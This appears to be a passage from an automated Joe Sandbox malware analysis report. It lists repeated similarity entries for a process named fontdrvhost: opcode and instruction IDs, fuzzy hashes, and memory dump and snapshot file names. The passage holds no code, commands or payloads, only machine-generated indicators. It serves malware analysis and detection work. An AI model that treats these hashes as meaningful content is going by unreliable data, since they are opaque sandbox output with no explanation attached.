                                                                                                                                                                                              • Opcode ID: 6a44afb55f9157f56b5c7aee45c30e6ee636279c8bbe1f18a47cd8326562b1aa
                                                                                                                                                                                              • Instruction ID: a658ea66d71cce0f062124aae3d8cf27ec3ea841368201ec666151689d101434
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a44afb55f9157f56b5c7aee45c30e6ee636279c8bbe1f18a47cd8326562b1aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: 16315932B1E65D8FE726A7A898651EC7760EF46324F0542F3D00CCB1D3E93826468761
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 57f6a1d563de438e7bf89e9e509663a96f7c122cfc777a9572d046f0c1466aef
                                                                                                                                                                                              • Instruction ID: 7dbb91d8295822d345ea947ca24276381f54854fa7b81dd319a80b07e3d45c75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f6a1d563de438e7bf89e9e509663a96f7c122cfc777a9572d046f0c1466aef
                                                                                                                                                                                              • Instruction Fuzzy Hash: C9315C34A1E55ECFEBA8DBA484616BD77B1FF44300F5300BAE42ED65A5DF38AA408741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 609b503b7ef520bbf1c1f0b447333ffb40d273bc2b6f9a4896e4761521b4a021
                                                                                                                                                                                              • Instruction ID: b42878499d36ee01c661d7fe88041b4068e2248b1778007112529f716d098c87
                                                                                                                                                                                              • Opcode Fuzzy Hash: 609b503b7ef520bbf1c1f0b447333ffb40d273bc2b6f9a4896e4761521b4a021
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D319130A0D68E8FDB56EBA4CC649A97FF0FF5A300B0905FBD009D71A3DA28A944C751
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2a8da33c24e56b1298b89439b8624fa711e1ce420ada8c5213a23ee11a2dac26
                                                                                                                                                                                              • Instruction ID: f1398c7ca6f40b4fee5c33102a323bfac3c9b518926e9abd67933b2fc33785eb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a8da33c24e56b1298b89439b8624fa711e1ce420ada8c5213a23ee11a2dac26
                                                                                                                                                                                              • Instruction Fuzzy Hash: FC210720B29D6D0FE79CF76C946A675B6C2EB9C715F4100B9E40EC32E6EC24EC414251
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 84374c9141f7c6206172ed5d1b22a6e81e4b657dd709ace39786ad3dea95c622
                                                                                                                                                                                              • Instruction ID: 8a33fb6364ec530e56489d803e5a9cef1bd0f6a4b0abdf7aa387626fe12b3114
                                                                                                                                                                                              • Opcode Fuzzy Hash: 84374c9141f7c6206172ed5d1b22a6e81e4b657dd709ace39786ad3dea95c622
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B314B10A5E5DA9BF739826844709B97F61EF5131171986BED0DB8B0EFC81CBA85C341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: aa43d1499fd6d17984c076d2433db2c339b265e6362ef7679afae6238df3de2f
                                                                                                                                                                                              • Instruction ID: 7fc13100e17dbf5d84044a6270ae6a7eeb3432c6e37eaf132c5ac27c680368a9
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa43d1499fd6d17984c076d2433db2c339b265e6362ef7679afae6238df3de2f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A314A35E1A91D9FEBA8DB6884A1BEDB7B1FB58300F0000BDD00EE3295CE356A418B00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 91c1f0134b89e1a2727bb1979f40c77363fa167379090d99bcc1c64b6d1539fe
                                                                                                                                                                                              • Instruction ID: 74009f6d040229aba87b2b86090b2df2964465a8d2b103237c79debc77b16dd0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 91c1f0134b89e1a2727bb1979f40c77363fa167379090d99bcc1c64b6d1539fe
                                                                                                                                                                                              • Instruction Fuzzy Hash: FA21DD31E1DA4E9FDBA5DFA8C8605FDBBB1FF58B00F51017AD00AE32A5DA256A01C740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0d836e23e74b4e69e77602ffedb857dc0c72f3ad3c524dd8c063b8f1355dc858
                                                                                                                                                                                              • Instruction ID: 15285eb56a678688a90b21bec446114cb9922652303644c4ffbcfb34f8ca492a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d836e23e74b4e69e77602ffedb857dc0c72f3ad3c524dd8c063b8f1355dc858
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F312910A1E59A4BF739836844785B87B91EF52301F1A45BEC08BCB6AFC86CBA818351
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5ce41b87d711e598a53133db35bf3ebd717a7dd2a5b6b56dae18634578229720
                                                                                                                                                                                              • Instruction ID: fa3d58608ed734737921c2e8e74b2d70f7020155058db200955457796478775d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ce41b87d711e598a53133db35bf3ebd717a7dd2a5b6b56dae18634578229720
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F21F232B1F98A4FFB69E7A858722BC77A0FF55710F1901BAD01DC76A7DA1869068340
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7885825f89e4b7aa8c6720a6f41dfd8792b53380e93b612faab4e1c130340c68
                                                                                                                                                                                              • Instruction ID: a2b5859aa67cd960ebeeb32f5ba6ea0f0895e5b3e6dbe8c40c586a1705a208e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7885825f89e4b7aa8c6720a6f41dfd8792b53380e93b612faab4e1c130340c68
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D21C534B0D90D4FE768EA2994A27BC73D1FF84310F154278E85ECB2E7DD1AA9428281
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: fbac62e7cc15935f1cc1189d5355af3f5305f5bf52fed8338d3397dbef9124e0
                                                                                                                                                                                              • Instruction ID: 8332f3a5d20d2bc31954164f109bd91a9204a22ca93559c5d92953be5071bce4
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbac62e7cc15935f1cc1189d5355af3f5305f5bf52fed8338d3397dbef9124e0
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1210835A0991D9FDFA9DB68C4A5AEDB7B1FF68300F1001ADD05EE3295CA35AA41CB00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e6a92d03e53f6a4603289ed5dc7167366928ef8dcfdf8b44f67a62bb25f98fcb
                                                                                                                                                                                              • Instruction ID: d02c01ab06d1e806f270f21d1562e841c07e744d9069b3a29a07fe980a2723af
                                                                                                                                                                                              • Opcode Fuzzy Hash: e6a92d03e53f6a4603289ed5dc7167366928ef8dcfdf8b44f67a62bb25f98fcb
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6218E30E1D95EDFDB94DBA8D8609EDBBB1FF49301F5101BAD00AE3295DA246942CB50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7f44c1d4ba7448527a933ec598c5f66b4d929a521147a856aaacecd48e77afd8
                                                                                                                                                                                              • Instruction ID: ac79f0ce9cc3219be8038d82dbbd04d6fef5fbc5237fa888e0bfa1486aa1992c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f44c1d4ba7448527a933ec598c5f66b4d929a521147a856aaacecd48e77afd8
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E210A71E1981D9FDF98DB58C466AEDB7B1FF68300F0141AED00EE3295CA34AA418B40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2939565054.00007FFD9BDC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDC0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bdc0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cab5bccc98e8cb21dfeefcf60f26e8ba905f53b60cc3634f438c559e2031fb10
                                                                                                                                                                                              • Instruction ID: ab933e54392af380eed6a410f71d51b2e9555de53a1ed0225451b8d6d43c9c28
                                                                                                                                                                                              • Opcode Fuzzy Hash: cab5bccc98e8cb21dfeefcf60f26e8ba905f53b60cc3634f438c559e2031fb10
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B1128A494E3C55FC71797348D28064BFB0AF5721570E42EBC4C9CA4B3D619494AC3A2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3eca53b342a9074ac17bf243c164ebcc017882b6599f30de4ce9e6c9cb161bf3
                                                                                                                                                                                              • Instruction ID: 67e2ef7898f93ce279157bec518ff3fdb2c39b80049005384fb9045f84c37a58
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eca53b342a9074ac17bf243c164ebcc017882b6599f30de4ce9e6c9cb161bf3
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE11E632B0E78D1FF37992E448286BD3BE5DB57350F060076D089EB2A3DD586A4683A1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 12e6211cdad57a629d01a873607787bee6243bb7e1b3a4e9f6ff6fb8eba82366
                                                                                                                                                                                              • Instruction ID: e1dd8c9a078ab273b58ca804635e327e704b99460ec14f94643eabfc75076a3e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12e6211cdad57a629d01a873607787bee6243bb7e1b3a4e9f6ff6fb8eba82366
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21213D31E1980D9FDFACDB68C466AADB7A1EF58300F4100BDE05FD72A5DE34A9418B00
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5114f3ffb957a769965316aab72f7320dacde68f1aa738eb971810f6025d1291
                                                                                                                                                                                              • Instruction ID: e0fc9fe6728a8d1691047cc95e335883e86da2796ec374b6842a2fbaef04f9a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5114f3ffb957a769965316aab72f7320dacde68f1aa738eb971810f6025d1291
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A112322F0FB8D5FF77096B408681BD2BA1EF56750F0A0477D049D72A2DE5869458381
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 06dc75420ebef1048db68c24ca04d2e6cba5eca7b16e63f78a9583018f49aab0
                                                                                                                                                                                              • Instruction ID: 1fdfffcd703ee9ca33b640a097b3c32ba45751f0ae40b87f75f57732c9646e1e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 06dc75420ebef1048db68c24ca04d2e6cba5eca7b16e63f78a9583018f49aab0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9311D620A6D46E97F67C86A884709BD7251FF90301B25867DD49F8B4EECC2CFA819781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 2f121cb0ab3274ce0552ee795e6f70386f8ea449caf28d6c0afb2313b0a31e53
                                                                                                                                                                                              • Instruction ID: 4a841df0e9eac7b1beae3d9dd4d9f151eb74063970222fdab3f907b6ec17040e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f121cb0ab3274ce0552ee795e6f70386f8ea449caf28d6c0afb2313b0a31e53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D110430B1990E4FEB68FB6494219F97391EF94351B410676E04EC35E7DE28B6058791
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 65f0da805b4f8293d6a01fe0901558d0c3c2aa14cccf17e2438f9fe84c20a017
                                                                                                                                                                                              • Instruction ID: 1e37a92f1108567158d7ae153201078fca9b58e65a4170f0b0cbc1f9d07ba2ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 65f0da805b4f8293d6a01fe0901558d0c3c2aa14cccf17e2438f9fe84c20a017
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E111631B1D50E4FEB74EFE8D564AB923D2EF98700F161175D44ED31B2DD28AA418610
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 36f7a7067ef66296be83e67e96bfe2c56ce3b6f7f9ad114b5e65fcc87906c1c5
                                                                                                                                                                                              • Instruction ID: 0d441764fd58a9cf11069a9753b40a21f9573c5527b96fa60049ab19f1496df2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 36f7a7067ef66296be83e67e96bfe2c56ce3b6f7f9ad114b5e65fcc87906c1c5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A116321F1D91E4EEBB8ABA885686B82291FF4C700F5601B5D44DE32B2EE286E414750
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bae3dc0559f4fad06ede3da2fbb1668713ae3c07d26965b9e6ad8c6c8726e7df
                                                                                                                                                                                              • Instruction ID: dbb4d490ddee319c3d3dec801b11e11c52871d9e59c46ca812048b5a1b593e56
                                                                                                                                                                                              • Opcode Fuzzy Hash: bae3dc0559f4fad06ede3da2fbb1668713ae3c07d26965b9e6ad8c6c8726e7df
                                                                                                                                                                                              • Instruction Fuzzy Hash: 51116B3130950F8FF729AA54D4256FC7390EF95391F16067AE80EC72E2CB29AA50C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d61b7a6165a5cf8754dbae75360b12432ae347b198d82ed3d395895626c94e41
                                                                                                                                                                                              • Instruction ID: b6ef8a96db6b17056f2b4d39459753629ceb5a5e0f24afacfc4205f94437413d
                                                                                                                                                                                              • Opcode Fuzzy Hash: d61b7a6165a5cf8754dbae75360b12432ae347b198d82ed3d395895626c94e41
                                                                                                                                                                                              • Instruction Fuzzy Hash: FF116B3170950F8FF728EA64D4256FC7390EF553E1F15067AE409C76E6CB29A640C7A0
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 739ed6b6c859a44c776f2ca01a6caaf5c8761fdcf4d4bd1bec6c4c02300bd321
                                                                                                                                                                                              • Instruction ID: b0864ad0bfc298100f5f707763056b3555a36021e8ca70e1f0567a1d72a7cf0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 739ed6b6c859a44c776f2ca01a6caaf5c8761fdcf4d4bd1bec6c4c02300bd321
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5010821B2990E4EE72CFB6494219FD7391FF54391B400676E04EC75E7DE28A60587A1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: a78085b81500868fa687cba67f42b6bc43848df2176fb365209342d019ffbc0b
                                                                                                                                                                                              • Instruction ID: c35b63118ce70bd03b22d292afb9aaf76529e49efa0184864304fcec5a9668cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: a78085b81500868fa687cba67f42b6bc43848df2176fb365209342d019ffbc0b
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8111934A1990D8FDB9CDB68D465AACB7A1FB58310F4100BEE05FE32A5CE34A9818B40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3cf7fac38be0b719e2a2e78da597fbaee2b06f74ee452445919f72abf18a2d71
                                                                                                                                                                                              • Instruction ID: 9ac3c541cd4cbc251a07c5f6224b6dd13425785577213a5030bbe54d2a457c5c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cf7fac38be0b719e2a2e78da597fbaee2b06f74ee452445919f72abf18a2d71
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C11C631B1E64D9FE7129BB498611AC7BB0EF56711F1641F3D048DB1A2E938270687A1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 104894fbd90a50f49447e412742c558f0dcca7f2bd637a1d1d2683ef4175cd12
                                                                                                                                                                                              • Instruction ID: 4794b11bb271edc651f1cff9137a70c441e5dd63a69a6c7c5e2f808901899464
                                                                                                                                                                                              • Opcode Fuzzy Hash: 104894fbd90a50f49447e412742c558f0dcca7f2bd637a1d1d2683ef4175cd12
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E012631B0994C4FEB68FBE898625ECB7B0EF09350F05057EE04DC71A7DD2458028700
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2937301340.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9bc90000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5b547dcd43ed4e0d7ce96b180ec6f0fe14eae1554b575c9c0c0575bbda14e845
                                                                                                                                                                                              • Instruction ID: 4ba2f82179a282bf3848065af87173e183cc3a5ff29afd0a7b157bdb98565ae4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b547dcd43ed4e0d7ce96b180ec6f0fe14eae1554b575c9c0c0575bbda14e845
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E110634F1991EDFDB98DF98D8609BDB7B1FF48340F510179E00AE32A5CA3469018B50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001A.00000002.2931707446.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_7ffd9b8a0000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
